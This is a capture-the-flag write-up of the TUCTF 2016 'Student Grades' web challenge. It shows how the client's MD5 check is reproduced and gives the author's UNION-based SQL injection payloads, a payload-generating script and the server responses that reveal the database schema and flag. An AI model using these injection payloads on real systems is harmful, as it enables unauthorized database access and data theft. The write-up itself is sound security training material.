Tags: web 


# Student Grades (Web, 50pts)

We are trying to find out what our grade was, but we don't seem to be in the database...

Can you help us out?

## Solution

We can see web application to check some user grades:

![Student Grades](assets/sg1.png)

When username is entered and 'Check my grades' pressed, little JavaScript code is executed sending AJAX request after some additional data manipulation:

var input = document.getElementById('info');
//var query = 'SELECT * from Names where name=\'' + input.value + '\'';
var inp_str = input.value;
inp_str = inp_str.replace(/\W+/g, " ");
var md5_str = md5(inp_str);
var send_str = inp_str+' '+md5_str;
var post_data = {name: send_str, submit:1};
type: "POST",
url: "/postQuery.php",
data: post_data,
success: function(data){document.getElementById('results').innerHTML=data;}

After quick investigation of response, there's SQL query in the comment:

![Student Grades](assets/sg3.png)

There's obvious SQL Injection flaw in this query (no data sanitization, used LIKE '%' and so on).

![Student Grades](assets/sg2.png)

I've created simple script to generate payloads and prepare them using formula find in JavaScript code above:

import hashlib

p = "boby' or '1'='1' order by 2,'"

h = hashlib.md5(p)
print "\n\n" + p + "+" + h.hexdigest()


First payload finds number of columns:

p = "boby' or '1'='1' order by 2,'"

Second payload execute UNION based SQL Injection:

p = "boby' and '1'='2' union select 1,'"

Next grabs table(s) and column(s):

name=boby' and '1'='2' union select group_concat(concat(table_name,0x20,column_name)),1 from information_schema.columns where table_schema=database() order by '+ba8883ed612a3d0b752759f01bbbf856

<tr><th>Name</th><th>Grade</th></tr><tr><td>tuctf_grades name,tuctf_grades grade,tuctf_info item,tuctf_info value,tuctf_junk item,tuctf_junk owner</td><td>1</td></tr>

Let's try table _tuctf___junk_:

name=boby' and '1'='2' union select group_concat(concat(item,0x20,owner)),1 from tuctf_junk order by '+ef78413334c102b4fc1426ec45325594


<tr><th>Name</th><th>Grade</th></tr><tr><td>A random server Bob</td><td>1</td></tr>

Nope. No flag in this table.

Next, _tuctf___info_ table:

name=boby' and '1'='2' union select group_concat(concat(item,0x20,value)),1 from tuctf_info order by '+f4028ff3dafb50d3853d22ced070d8cc

And, here we go :)

<tr><th>Name</th><th>Grade</th></tr><tr><td>flag TUCTF{v4ccinate_y0ur_databa5e5}</td><td>1</td></tr>


Original writeup (https://github.com/bl4de/ctf/tree/master/2016/TUCTF_2016/Student_Grades_Web50).